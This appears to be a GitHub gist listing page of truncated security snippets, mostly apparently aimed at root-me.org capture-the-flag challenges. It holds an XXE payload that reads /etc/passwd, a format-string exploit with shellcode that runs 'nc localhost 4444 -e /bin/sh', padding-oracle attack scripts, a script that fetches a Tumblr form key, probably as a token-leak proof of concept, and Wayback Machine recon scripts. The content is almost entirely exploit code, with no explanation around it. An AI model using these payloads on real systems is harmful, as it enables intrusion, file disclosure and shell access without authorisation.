This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var xhttp = new XMLHttpRequest(); | |
xhttp.onreadystatechange = function() { | |
if (this.readyState == 4 && this.status == 200) { | |
// Typical action to be performed when the document is ready: | |
alert(xhttp.responseText); | |
} | |
}; | |
xhttp.open("POST", "https://www.tumblr.com/svc/secure_form_key", true); | |
xhttp.send(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import json | |
def waybackurls(host, with_subs): | |
if with_subs: | |
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
else: | |
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import re | |
import sys | |
from multiprocessing.dummy import Pool | |
def robots(host): | |
r = requests.get( | |
'https://web.archive.org/cdx/search/cdx\ | |
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" > | |
]> | |
<rss version="2.0"> | |
<channel> | |
<title>Mon site</title> | |
<description>Ceci est un exemple de flux RSS 2.0</description> | |
<lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, struct, pipes, subprocess | |
from time import sleep | |
import sys, os | |
HOST, PORT = ('challenge03.root-me.org', 2223) | |
RET = 0x08049754 | |
BUFFER_ADDR = 0x8049880 | |
FMT_OFFSET = 145 | |
SHELLCODE = '\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x6e\x63\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x20\x34\x34\x34\x34\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from paddingoracle import BadPaddingException, PaddingOracle | |
from base64 import b64encode, b64decode | |
from urllib import quote, unquote | |
import socket | |
import time | |
class PadBuster(PaddingOracle): | |
def __init__(self, **kwargs): | |
super(PadBuster, self).__init__(**kwargs) | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket, sys | |
from time import sleep | |
from binascii import hexlify | |
HOST = 'challenge01.root-me.org' | |
PORT = 51014 | |
BLOCK_SIZE = 16 |
NewerOlder